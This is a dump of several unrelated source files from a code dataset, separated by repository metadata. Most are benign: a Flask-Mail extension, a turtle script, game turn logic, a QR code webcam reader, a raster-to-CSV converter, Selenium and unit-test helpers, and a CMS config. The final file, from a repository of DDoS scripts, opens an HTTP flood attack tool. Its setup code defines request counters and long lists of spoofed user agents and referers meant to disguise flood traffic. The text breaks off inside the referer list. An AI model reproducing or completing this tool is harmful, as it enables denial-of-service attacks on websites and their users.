        Checks for bad headers i.e. newlines in subject, sender or recipients.
        RFC5322 allows multiline CRLF with trailing whitespace (FWS) in headers
        """
        headers = [self.sender, self.reply_to] + self.recipients
        for header in headers:
            if _has_newline(header):
                return True

        if self.subject:
            if _has_newline(self.subject):
                # Multiline subjects are only legal as RFC 5322 folded
                # whitespace: each continuation line must be non-empty,
                # start with a tab/space, and contain no further newlines.
                for linenum, line in enumerate(self.subject.split('\r\n')):
                    if not line:
                        return True
                    if linenum > 0 and line[0] not in '\t ':
                        return True
                    if _has_newline(line):
                        return True
                    if len(line.strip()) == 0:
                        return True
        return False

    def is_bad_headers(self):
        # Deprecated alias kept for backwards compatibility.
        from warnings import warn
        warn(DeprecationWarning('is_bad_headers is deprecated, use the'
                                ' new has_bad_headers method instead.'),
             stacklevel=1)
        return self.has_bad_headers()

    def send(self, connection):
        """
        Verifies and sends the message.
        """
        return connection.send(self)

    def add_recipient(self, recipient):
        """
        Adds another recipient to the message.

        :param recipient: email address of recipient.
        """
        self.recipients.append(recipient)

    def attach(self,
               filename=None,
               content_type=None,
               data=None,
               disposition=None,
               headers=None,
               content_id=None):
        """
        Adds an attachment to the message.

        :param filename: filename of attachment
        :param content_type: file mimetype
        :param data: the raw file data
        :param disposition: content-disposition (if any)
        :param content_id: content-id
        """
        self.attachments.append(
            Attachment(filename, content_type, data, disposition,
                       headers, content_id)
        )
class _MailMixin(object):
    """Shared behavior for both the bound ``_Mail`` state object and the
    ``Mail`` extension facade."""

    @contextmanager
    def record_messages(self):
        """
        Records all messages. Use in unit tests for example::

            with mail.record_messages() as outbox:
                response = app.test_client.get("/email-sending-view/")
                assert len(outbox) == 1
                assert outbox[0].subject == "testing"

        You must have blinker installed in order to use this feature.

        :versionadded: 0.4
        """
        if not email_dispatched:
            raise RuntimeError("blinker must be installed")

        outbox = []

        def _record(message, app):
            outbox.append(message)

        # Capture every email_dispatched signal for the duration of the
        # ``with`` block, then always disconnect.
        email_dispatched.connect(_record)

        try:
            yield outbox
        finally:
            email_dispatched.disconnect(_record)

    def send(self, message):
        """
        Sends a single message instance. If TESTING is True the message will
        not actually be sent.

        :param message: a Message instance.
        """
        # A fresh connection is opened and closed per message.
        with self.connect() as connection:
            return message.send(connection)

    def send_message(self, *args, **kwargs):
        """
        Shortcut for send(msg).

        Takes same arguments as Message constructor.

        :versionadded: 0.3.5
        """
        return self.send(Message(*args, **kwargs))

    def connect(self):
        """
        Opens a connection to the mail host.
        """
        # ``Mail`` instances carry ``app``; ``_Mail`` falls back to the
        # current application context.
        app = getattr(self, "app", None) or current_app
        try:
            return Connection(app.extensions['mail'])
        except KeyError:
            raise RuntimeError("The curent application was"
                               " not configured with Flask-Mail")
class _Mail(_MailMixin):
    """Plain configuration holder stored in ``app.extensions['mail']``."""

    def __init__(self, server, username, password, port, use_tls, use_ssl,
                 default_sender, debug, max_emails, suppress,
                 ascii_attachments=False):
        self.server = server
        self.username = username
        self.password = password
        self.port = port
        self.use_tls = use_tls
        self.use_ssl = use_ssl
        self.default_sender = default_sender
        self.debug = debug
        # Recycle the SMTP connection after this many messages (None = never).
        self.max_emails = max_emails
        # When true, no connection is opened and nothing is sent.
        self.suppress = suppress
        self.ascii_attachments = ascii_attachments
class Mail(_MailMixin):
    """
    Manages email messaging

    :param app: Flask instance
    """

    def __init__(self, app=None):
        self.app = app
        # Supports both the direct and the deferred (init_app) patterns.
        if app is not None:
            self.state = self.init_app(app)
        else:
            self.state = None

    def init_mail(self, config, debug=False, testing=False):
        # Build the immutable state object from the app configuration,
        # falling back to sensible localhost defaults.
        return _Mail(
            config.get('MAIL_SERVER', '127.0.0.1'),
            config.get('MAIL_USERNAME'),
            config.get('MAIL_PASSWORD'),
            config.get('MAIL_PORT', 25),
            config.get('MAIL_USE_TLS', False),
            config.get('MAIL_USE_SSL', False),
            config.get('MAIL_DEFAULT_SENDER'),
            int(config.get('MAIL_DEBUG', debug)),
            config.get('MAIL_MAX_EMAILS'),
            config.get('MAIL_SUPPRESS_SEND', testing),
            config.get('MAIL_ASCII_ATTACHMENTS', False)
        )

    def init_app(self, app):
        """Initializes your mail settings from the application settings.

        You can use this if you want to set up your Mail instance
        at configuration time.

        :param app: Flask application instance
        """
        state = self.init_mail(app.config, app.debug, app.testing)

        # register extension with app
        app.extensions = getattr(app, 'extensions', {})
        app.extensions['mail'] = state
        return state

    def __getattr__(self, name):
        # Delegate unknown attributes (server, port, ...) to the bound state.
        return getattr(self.state, name, None)
# Blinker signal fired for every dispatched message (also in suppressed
# mode); record_messages() relies on it.
signals = blinker.Namespace()

email_dispatched = signals.signal("email-dispatched", doc="""
Signal sent when an email is dispatched. This signal will also be sent
in testing mode, even though the email will not actually be sent.
""")
| [
"briancappello@gmail.com"
] | briancappello@gmail.com |
b6e2db285793968bc194f0cc1a2912dc59ad5622 | 8cadb441c5734c6dae2ed47419bd1ce5fac69afa | /13-파이썬기초_내장모듈2.py | bf78b99950cb5a27de4d0b30b38bf211c65a305d | [] | no_license | swj8905/Basic_Course_0904 | cf969a14ececacd369377bc9db611b639a4823a0 | 501620bb185851c3638d3b2029cc8259de67d770 | refs/heads/master | 2023-08-01T04:08:51.134526 | 2021-09-12T04:18:50 | 2021-09-12T04:18:50 | 402,959,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | import turtle as t
# Draw an equilateral triangle with a circle on top using turtle graphics.
t.shape("turtle")
for i in range(3):
    # Each side is 100 units; turning 120 degrees closes the triangle.
    t.forward(100)
    t.left(120)
t.circle(50)
t.done()
"swj8905@naver.com"
] | swj8905@naver.com |
5f67ab5c03e5c44dd8eafab1df10221c656733c3 | 3a60b8935f809e300405214a66d949f0042e7e46 | /src/game/logic/player_control/player_control.py | 01107f77ef3e00a355c7b889bb6556490849130a | [] | no_license | stellarlib/centaurus | e71fe5c98b94e8e575d00e32f55ba39fe71799e6 | 896ae73165f3f44dfb87378ef2635d447ccbccae | refs/heads/master | 2020-08-29T00:02:47.294370 | 2020-07-06T20:06:02 | 2020-07-06T20:06:02 | 217,860,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,929 | py | from .standard_control import StandardControl
from .jump_control import JumpControl
from .ranged_control import RangedControl
from .charge_control import ChargeControl
from .action_cost import *
class PlayerControl(object):
    """Routes player input (clicks, mode buttons) to game actions, tracks
    the current action mode, and drives the player-turn lifecycle."""

    # Action-mode identifiers.
    STD = 0
    RANGED = 1
    JUMP = 2
    CHARGE = 3

    # Maps the button ids from the UI panel to mode constants.
    str_to_enum = {
        'std': STD,
        'ranged': RANGED,
        'jump': JUMP,
        'charge': CHARGE,
    }

    # Action-point cost of entering/using each mode (constants imported
    # from action_cost).
    action_cost = {
        STD: MOVE_COST,
        RANGED: RANGED_COST,
        JUMP: JUMP_COST,
        CHARGE: CHARGE_COST
    }

    def __init__(self, logic):
        self.game = logic.game
        self.logic = logic

        cls = PlayerControl

        self.mode = cls.STD
        # One sub-controller per mode; clicks are delegated to the active one.
        self.controls = {
            cls.STD: StandardControl(self),
            cls.RANGED: RangedControl(self),
            cls.JUMP: JumpControl(self),
            cls.CHARGE: ChargeControl(self)
        }

        self._player_turn = True
        self._animating = False

    @property
    def player(self):
        return self.logic.player

    @property
    def active(self):
        # Input is only accepted during the player's turn and while no
        # animation is in flight.
        return self._player_turn and not self._animating

    @property
    def button_map(self):
        return self.game.buttons

    #####################
    #   Routing input   #
    #################

    def switch_mode(self, mode_name):
        # this models the panel of buttons where the player toggles between action types
        cls = PlayerControl
        mode = cls.str_to_enum[mode_name]
        if self.mode == mode:
            # Clicking the active mode button toggles back to standard.
            self.mode = cls.STD
            #print('switched to standard mode')
            self.reset_mode_panel()

        else:
            cost = cls.action_cost[mode]
            if cost > self.player.actions:
                #print("can't switch to ", mode_name, " mode - insufficient player actions")
                # Signal the refusal visually instead of switching.
                button = self.button_map.get_button_by_id(mode_name)
                button.rumble()
            else:
                self.mode = mode
                self.controls[self.mode].init_mode()
                # print('switched to ', mode_name, ' mode')
                self.reset_mode_panel()
                if mode_name != 'std':
                    button = self.button_map.get_button_by_id(mode_name)
                    button.button_down()

    def reset_mode_panel(self):
        # Visually release every mode button.
        [button.button_up() for button in self.button_map.get_button_group('action_mode')]

    def handle_click(self, pos):
        # Delegate the click to the controller of the current mode.
        if self.active:
            self.controls[self.mode].handle_click(pos)

    def manual_switch_mode(self, mode_name):
        if self.active:
            self.switch_mode(mode_name)
        else:
            button = self.button_map.get_button_by_id(mode_name)
            button.rumble()

    def manual_turn_end(self):
        # "Skip turn" button: rest (restore 1 AP) and pass the turn.
        if self.active:
            self.rest()
            button = self.button_map.get_button_by_id('skip')
            button.button_down()

    def start_animating(self):
        self._animating = True

    def end_animating(self):
        self._animating = False

    ##########################################################
    # Player controls
    ####################
    # Each action follows the same pattern: block input, start the
    # animation, and pass a resolve callback that pays the AP cost and
    # unblocks input when the animation completes.

    def move_player(self, pos):

        def resolve_func():
            self.spend_action(MOVE_COST)
            self.end_animating()

        self.start_animating()
        self.player.start_move(pos, resolve_func)

    def player_exits_level(self, pos):

        def resolve_func():
            self.end_animating()
            self.player.travel_component.travel_to_next_level(pos)

            # get next level according to pos
            # get the new player pos on that level
            # start the new level, put player in new pos
            # refresh the turn so it is player start turn, full AP

        self.start_animating()
        self.player.start_exit_move(pos, resolve_func)

    def jump_player(self, pos):

        def resolve_func():
            self.spend_action(JUMP_COST)
            self.end_animating()

        self.start_animating()
        self.player.start_jump(pos, resolve_func)

    def player_jump_attacks(self, pos):
        foe = self.logic.get_actor_at(pos)

        def resolve_func():
            # The melee hit lands when the jump animation resolves.
            self.player.melee_attack(foe)
            self.spend_action(JUMP_COST)
            self.end_animating()

        self.start_animating()
        self.player.start_jump_attack(pos, resolve_func)

    def player_attacks(self, pos):
        foe = self.logic.get_actor_at(pos)
        assert foe != self.player

        def resolve_func():
            self.spend_action(MELEE_COST)
            self.end_animating()

        self.start_animating()
        self.player.start_melee_attack(foe, resolve_func)

    def player_ranged_attacks(self, pos):
        foe = self.logic.get_actor_at(pos)
        assert foe != self.player

        def resolve_func():
            self.spend_action(RANGED_COST)
            self.end_animating()

        # NOTE(review): unlike the other actions, this one never calls
        # start_animating() before start_ranged_attack -- confirm whether
        # that is intentional.
        self.player.start_ranged_attack(pos, resolve_func)

    def charge_player(self, charge_path):

        def resolve_func():
            self.spend_action(CHARGE_COST)
            self.end_animating()

        self.start_animating()
        self.player.start_charge(charge_path, resolve_func)

    ###################################################
    #    Game Logic   #
    ##############

    def spend_action(self, x):
        # Reset to standard mode, deduct AP, and end the turn at zero AP.
        self.switch_mode('std')
        assert x <= self.player.actions
        self.player.spend_actions(x)
        if self.player.actions == 0:
            self.end_turn()

    def start_player_turn(self):
        self._player_turn = True
        self.set_up_turn()

    def set_up_turn(self):
        # Player regains 2 AP at the start of each turn.
        self.player.restore(2)

    def tear_down_turn(self):
        print('player turn over')
        self.logic.start_ai_turn()

    def end_turn(self):
        self.tear_down_turn()
        self._player_turn = False

    def rest(self):
        # Resting grants 1 extra AP but forfeits the rest of the turn.
        self.player.restore(1)
        self.end_turn()
| [
"marzecsean@gmail.com"
] | marzecsean@gmail.com |
71fe371cda7d83fe8f25cf62601d8c71bf778d42 | 7c6598d32701acaa47e5a010504a47ea502061bd | /old_py/QRcode_demo_0.py | 68315b16bdf48c909721083c077b884dcb8e0245 | [] | no_license | markkua/RobotArm | fed669eb36a0b7c0be2f1b6023b839de9ac61540 | fe7dcdddb4757c5a2e79229d3c3e9fc5014c6043 | refs/heads/master | 2022-05-04T19:41:46.146579 | 2022-04-14T14:22:18 | 2022-04-14T14:22:18 | 198,443,105 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,332 | py | # -*- encoding: utf-8 -*-
import cv2
import numpy as np
from pyzbar.pyzbar import decode
import cv2
import pyzbar.pyzbar as pyzbar
def decodeDisplay(image):
    """Decode all barcodes/QR codes in *image*, draw their bounding boxes
    and decoded text onto it, and return the annotated image."""
    barcodes = pyzbar.decode(image)
    for barcode in barcodes:
        # Extract the bounding box of the barcode and draw it on the image.
        (x, y, w, h) = barcode.rect
        cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)

        # The barcode payload is a bytes object, so decode it to a string
        # before drawing it on the output image.
        barcodeData = barcode.data.decode("utf-8")
        barcodeType = barcode.type

        # Draw the barcode data and type on the image.
        text = "{} ({})".format(barcodeData, barcodeType)
        cv2.putText(image, text, (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX,
                    .5, (0, 0, 125), 2)

        # Print the barcode data and type to the terminal.
        print("[INFO] Found {} barcode: {}".format(barcodeType, barcodeData))
    return image
def detect():
    """Continuously grab frames from the default camera, decode any
    barcodes in them, and display the annotated feed until 'q' is pressed."""
    camera = cv2.VideoCapture(0)

    while True:
        # Read the current frame.
        ret, frame = camera.read()
        # Convert to grayscale for the decoder.
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        im = decodeDisplay(gray)

        cv2.imshow("camera", im)
        key = cv2.waitKey(1)
        if ord('q') == key:
            break

    camera.release()
    cv2.destroyAllWindows()
if __name__ == '__main__':
    # Run the live camera scanner only when executed as a script.
    detect()
"markkua@live.com"
] | markkua@live.com |
c6a945a9af09303e35a60962d0884c7ad7e64f0a | 06129696dde15566e1a7a032f7f11c4f6bc4402a | /RasterToArray.py | 206af530b0c3a991d86fa1d95e079594f6a0cc12 | [] | no_license | NaomiBda/Remote_sensing_yields | caa8aa79aaf2818bf18bb46eb73bb96e3e02bc7d | 61f6d9a3bf38cb1b37c00d7dbb2d70e0d8d4bc30 | refs/heads/master | 2023-02-02T10:51:51.505262 | 2020-12-24T06:45:12 | 2020-12-24T06:45:12 | 246,301,699 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 12 14:24:13 2020
@author: naomiberda
"""
import rasterio as rio
import numpy as np
import pandas as pd
def noNa(path_drone):
    """Collect the ``[row, col]`` indices of no-data pixels.

    The drone raster is the reference: a pixel is treated as no-data when
    its first-band value is negative.

    :param path_drone: full path (directory + filename) of the drone raster
    :return: list of ``[row, col]`` lists, one per no-data pixel
    """
    src = rio.open(path_drone)
    band1 = src.read(1)
    (n, m) = src.shape
    return [[row, col]
            for row in range(n)
            for col in range(m)
            if band1[row, col] < 0]
def transform(path, raster, path_drone):
    """Flatten an n*m raster with b bands into a ``(n*m - #NA) x (b+2)`` array.

    Column 0 and 1 hold the row and column index of each pixel; the
    remaining b columns hold the band values. Pixels flagged as NA in the
    drone reference image (see ``noNa``) are skipped.

    path       -- directory containing the raster
    raster     -- raster file name
    path_drone -- full path of the drone reference raster
    """
    # Convert the NA pixel list to a set of tuples: membership tests drop
    # from O(len(list)) per pixel to O(1), avoiding quadratic behaviour.
    na_pixels = {tuple(p) for p in noNa(path_drone)}
    src = rio.open(path + raster)
    b = src.count        # number of bands
    (n, m) = src.shape   # raster size
    # Read all bands once (shape (b, n, m)); the original re-read the whole
    # band from disk for every single pixel.
    data = src.read()
    matrice = np.zeros((n * m - len(na_pixels), b + 2))
    k = 0  # running row index in the output matrix
    for i in range(n):
        for j in range(m):
            if (i, j) not in na_pixels:
                matrice[k, 0] = int(i)
                matrice[k, 1] = int(j)
                # All band values of pixel (i, j) at once.
                matrice[k, 2:] = data[:, i, j]
                k += 1
    return matrice
def write_csv(path, matrice, header, formt):
    """Dump *matrice* as ``matrice_indices.csv`` inside *path*.

    path    -- directory prefix (including trailing separator) for the output
    matrice -- 2-D array to export
    header  -- header text written at the top of the file
    formt   -- format specifier(s) understood by ``np.savetxt``
               (e.g. '%d' for integers, '%1.4f' for 4-decimal floats)
    """
    target = path + "matrice_indices.csv"
    np.savetxt(target, matrice, delimiter=",", fmt=formt, header=header)
if __name__=='__main__':
    # Input locations: uncomment the 2018 block (and comment out the 2019
    # one) to process the other campaign. Paths point at an external drive.
    #2018
    # path='/Volumes/My Passport 1/TempNaomi/Donnees/Planet/plot 2018/'
    #path_drone='/Volumes/My Passport 1/TempNaomi/Donnees/Drone/2018/Niakhar/2018_10_08/plot 2018/NDVI_norm_0/valuesModel/2018reprojetedrone.tif'
    #raster='allindexesPlanet2018.tif'
    #2019
    path='/Volumes/My Passport 1/TempNaomi/Donnees/Planet/plot 2019/'
    path_drone='/Volumes/My Passport 1/TempNaomi/Donnees/Drone/2019/Niakhar/19-09-05/plot 2019/NDVI_norm_0/valuesModel/drone2019projete.tif'
    raster='Planetallindexes2019.tif'
    # Build the (pixels x bands) matrix from the Planet raster, masked by the
    # drone NA pixels, then export it as CSV next to the Planet data.
    #code
    matrice=transform(path,raster,path_drone)
    header='pixel line index,pixel column index,NDVI value, NDVI norm value,EVI value, GNDVI value,Excess green value, MSVAI value'
    formt='%d','%d','%1.4f','%1.4f','%1.4f','%1.4f','%d','%1.4f' # '%d' means integer values, '%1.4f' means a float with 4 decimal places
    print(matrice)
    write_csv(path,matrice,header,formt)
    #write_csv(matrice,entete)
| [
"38361396+NaomiBda@users.noreply.github.com"
] | 38361396+NaomiBda@users.noreply.github.com |
815c76dd550f722378d6bff415d0149b9b990336 | e793d5a3554270823529f7463f42151fc1813e39 | /penzgtu/application.py | 1df9d96ad7917a6ebf9fe9ca96c4221610a971c2 | [] | no_license | VadimDunin/TestSeleniumSamples | bbd8e3bc7ead22286daafbed82a3173b7ce0afd2 | 9423c7009c9635702825a1f49411efe4e15ca13c | refs/heads/master | 2022-10-21T22:21:23.588118 | 2020-06-10T18:06:33 | 2020-06-10T18:06:33 | 271,199,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 402 | py | from selenium.webdriver.chrome.webdriver import WebDriver
from main_page import MainPage
class Application:
    """Test-application facade: owns the Selenium WebDriver and page objects."""

    def __init__(self, driver_path="C:\Temp\ChromeDriver\83.exe", implicit_wait=5):
        # The driver path and implicit wait were hard-coded; they are now
        # parameters whose defaults are the previous literals, so existing
        # callers keep working unchanged.
        self.app = WebDriver(executable_path=driver_path)
        self.app.implicitly_wait(implicit_wait)
        # Page objects receive this facade so they can reach the driver.
        self.main_page = MainPage(self)

    def quit(self):
        """Shut down the browser and release the driver process."""
        self.app.quit()

    def open_page(self, url="http://www.penzgtu.ru"):
        """Navigate the browser to *url* (the university main page by default)."""
        self.app.get(url)
"duninv@gmail.com"
] | duninv@gmail.com |
89fe64bb16e4911173adfeeedc5c0b370f1d07e4 | af2c6e555b9ecb67a6594ba8c7df308a12443a85 | /tests/unittests/test_read_from_file.py | d83465df683f176239a58ca5906fe393fb95edcb | [] | no_license | soulnai/internal | 97df543711e5daf62a5cfee92a29010d8442b9d0 | 887cef9b868c5f97f6463ce83d5af0795d8fe4bb | refs/heads/master | 2016-09-03T06:57:50.016593 | 2014-12-04T15:02:24 | 2014-12-04T15:02:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 955 | py | #from __future__ import unicode_literals
from unittest import TestCase
import unittest
import mock
import game.io_
import StringIO
__author__ = 'avasilyev2'
# Canned file contents (three domain lines wrapped in blank lines) used to
# stub out ``open`` in TestReadFromFile.test_read_from_file below.
TEST_TEXT = """
domain1.com
domain2.com
domain3.com
"""
class TestReadFromFile(TestCase):
    """Unit tests for the ``game.io_`` I/O helpers.

    NOTE(review): this module targets Python 2 -- it relies on the ``file``
    builtin and the ``__builtin__`` module, neither of which exists under
    Python 3, so it will fail there.
    """
    def test_read_from_file(self):
        # Stand-in file handle; spec=file restricts the mock to the file API.
        my_mock = mock.MagicMock(spec=file)
        # Patch the builtin ``open`` so read_from_file sees TEST_TEXT instead
        # of touching the real filesystem.
        with mock.patch('__builtin__.open', mock.mock_open(read_data=TEST_TEXT), create=True):
            lines = game.io_.read_from_file(my_mock)
        # Expected: surrounding blank lines stripped, one entry per line.
        self.assertEquals(lines, TEST_TEXT.strip().splitlines())
    def test_get_answer(self):
        # Only the return *type* is pinned down here; presumably get_answer
        # parses numeric input lines into a list -- verify against game.io_.
        f = ["12\n", "23\n", "34\n"]
        ret = game.io_.get_answer(f)
        self.assertIsInstance(ret, list, "List should be returned")
    def test_get_guess(self):
        # get_guess should yield a single guess string from the input lines.
        f = ["12345\n", "12346\n", "12347\n"]
        ret = game.io_.get_guess(f)
        self.assertIsInstance(ret, str, "Str should be returned")
        # Redundant ``pass``; kept to leave the code untouched.
        pass
# Allow running the test module directly: ``python test_read_from_file.py``.
if __name__ == '__main__':
    unittest.main()
"soulnai@gmail.com"
] | soulnai@gmail.com |
edd5de10db555203eeb30040b17b795764b8f079 | 41bfb83fdbfe8114b4b709da1931a30278c2370a | /fairlearn/post_processing/__init__.py | f7f7d0cc4e7af444dc88f63c764a8cba29b359c0 | [
"MIT"
] | permissive | seongl/fairlearn | 6e95d5bd6eb7498a12be68000279a79767c78b57 | 4f8dddad9fe24a914db4ffd3a2f699e3248c46c5 | refs/heads/master | 2020-08-14T12:24:58.839830 | 2019-10-14T17:38:30 | 2019-10-14T17:38:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from .post_processing import PostProcessing # noqa: F401
from .threshold_optimizer import ThresholdOptimizer # noqa: F401
| [
"noreply@github.com"
] | seongl.noreply@github.com |
bd5b68d31c1dfff4c57d83ec3c12c7d3a1751700 | 681ad82b3c7f18411f83a4be2c190a7cd123ce8a | /EDBRCommon/python/datasets/cmgTupleList_XWW/cmgTuple_0314_CA8/cmgTuple_RSG_WW_lvjj_c0p2_M600_xww_cff.py | 0942c55b6711dc8ad9941a5bd92959d18d54163b | [] | no_license | cms-edbr/ExoDiBosonResonances | 5009161fdc76b39f121316e26497bedd29abe3d7 | b8ae400a20bfb8ed66c83b8f38e98d853058ae17 | refs/heads/master | 2021-01-19T18:33:17.435519 | 2014-03-12T12:00:43 | 2014-03-12T12:00:43 | 12,613,661 | 0 | 0 | null | 2015-10-18T15:06:39 | 2013-09-05T09:06:16 | Python | UTF-8 | Python | false | false | 1,101 | py | import FWCore.ParameterSet.Config as cms
# Container for the input file names; filled below and shared with ``source``.
cmgFiles = cms.untracked.vstring()
# PoolSource reading the CMG tuples. Event sorting and duplicate checking
# are disabled for speed on this MC sample.
source = cms.Source("PoolSource",
    noEventSort = cms.untracked.bool(True),
    duplicateCheckMode = cms.untracked.string("noDuplicateCheck"),
    fileNames = cmgFiles
    )
# RS graviton -> WW -> lvjj sample (c = 0.2, M = 600 GeV): five CMG-tuple
# files from the 0312 production on Summer12 with CA8 jets.
cmgFiles.extend([
    '/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_0.root',
    '/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_1.root',
    '/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_2.root',
    '/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_3.root',
    '/store/user/shuai/ExoDiBosonResonances/CMGtuple/production0312/Summer12/CA8//RSG_WW_lvjj_c0p2_M600_xww/cmgTuple_4.root',
    ])
| [
""
] | |
2c95291499f567de5b404c3a0497041dbf0cbaf3 | 0872dbbd571aa2b4a4fe1dc7174f74108be7c653 | /hellsec.py | 9030e328abd1822959abe9ac494dfc544c39c391 | [] | no_license | JOJO123218/PythonDDOS-Scripts-Fixed | fe85d5e077c24297312d52d0a956cdf17b4e24cb | 7354ff12bf43abfa68175ca2a72d48bbaa8fd00e | refs/heads/main | 2023-07-31T23:01:17.386562 | 2021-10-04T15:10:46 | 2021-10-04T15:10:46 | 413,472,458 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56,936 | py | # -*- coding: utf-8 -*-
# coding: utf-8
# coding: latin-1
from urllib.request import urlopen, HTTPError, URLError
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=45
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://www.bing.com/search?q=')
headers_referers.append('http://search.yahoo.com/search?p=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
